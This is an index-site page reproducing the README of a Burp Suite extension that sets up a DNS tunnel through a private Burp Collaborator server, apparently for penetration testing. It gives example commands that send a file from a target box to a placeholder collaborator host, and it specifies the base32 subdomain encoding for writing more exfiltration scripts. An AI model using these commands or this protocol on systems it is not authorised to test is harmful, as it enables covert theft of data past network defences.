Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/netspi/burpcollaboratordnstunnel

A DNS tunnel utilizing the Burp Collaborator
https://github.com/netspi/burpcollaboratordnstunnel

Last synced: about 1 month ago
JSON representation

A DNS tunnel utilizing the Burp Collaborator

Awesome Lists containing this project

README 

        
# BurpCollaboratorDNSTunnel

A DNS tunnel utilizing the Burp Collaborator.



This extension sets up a private Burp Collaborator server as a DNS tunnel.  One of the provided scripts will be used to exfiltrate data from a server through the DNS tunnel, displaying the tunneled data in Burp Suite.



### Interactive usage with scripts

Multiple scripts exist for exfiltrating data from different environments.  The scripts will be set up on the box to exfiltrate data from and will connect to a Burp Suite instance on our local box.



_[B] Burp Suite_



_[S] Script_



1) [B] Click "Start listening"

2) [B] Copy the printed location of the Burp Collaborator server

3) [S] Run the script

4) [S] Enter the Burp Collaborator address from (2) when prompted

5) [S] Paste file name to be tunneled when prompted

6) [B] After tunneling is completed click "Poll now"



### Non-interactive usage with scripts

The scripts don't require user interaction if all the necessary information is provided as arguments. 



_[B] Burp Suite_



_[S] Script_



1) [B] Click "Start listening"

2) [B] Copy the printed location of the Burp Collaborator server

3) [S] Run the script

    - Windows: `./tunnel.ps1 abc123.private-burp.com .\test.txt`

    - Linux: `./tunnel.sh -d abc123.private-burp.com -f test.txt`

4) [B] After tunneling is completed click "Poll now"



### Usage between 2 Burp Suite instances

_[R] Receiving Burp instance_



_[S] Sending Burp instance_



1) [R] Click "Start listening"

2) [R] Copy the printed location of the Burp Collaborator server

3) [S] Enter the address from (2) in the "Burp Collaborator Address" text box

4) [S] Paste data to be tunneled in the "Data to tunnel" text box

5) [S] Click "Tunnel Data"

6) [R] After tunneling is completed click "Poll now"



Check the "Verbose" box for debugging information to see any errors in sending/receiving data.



### Contributing

It would be nice to have more compact versions of the scripts for instances where you have to hand-type the scripts into the environment.  If you would like to modify or add a script follow the basic protocol below:



#### 1) Tunneling Data

```

[dnsFlag].[chunk].[chunkNumber].[burpcollaborator] #eg: nspi.JZSXIU2QJEQGS4ZAMF3WK43PNVSSC.0.fdwkpqtwvgxpk4toz2yduzx75ybozd.private-burp-collaborator.net

[dnsFlag] All data being tunneled needs to start with the 'nspi' subdomain, this is a flag for the tunnel to identify traffic

[chunk] Will be a 63-character base32-encoded chunk of data, removing any padding '='

[chunkNumber] Is the index of the current chunk in the overall tunneled data

[burpcollaborator] Is the full address of the private Burp Collaborator server

```



#### 2) Notifying size of data sent

```

[dnsFlag].[amountFlag].[totalChunkCount].[burpcollaborator] #eg: nspi.amount.1.fdwkpqtwvgxpk4toz2yduzx75ybozd.private-burp-collaborator.net

[dnsFlag] All data being tunneled needs to start with the 'nspi' subdomain, this is a flag for the tunnel to identify traffic

[amountFlag] This subdomain's value will be 'amount' so the tunnel can identify this is as the request declaring the amount of data sent

[totalChunkCount] The total number of chunks sent through the tunnel, excluding this request

[burpcollaborator] Is the full address of the private Burp Collaborator server

```



### Example

An example is below (click to enlarge).  The example is using one Burp Suite instance and a Kali Linux box.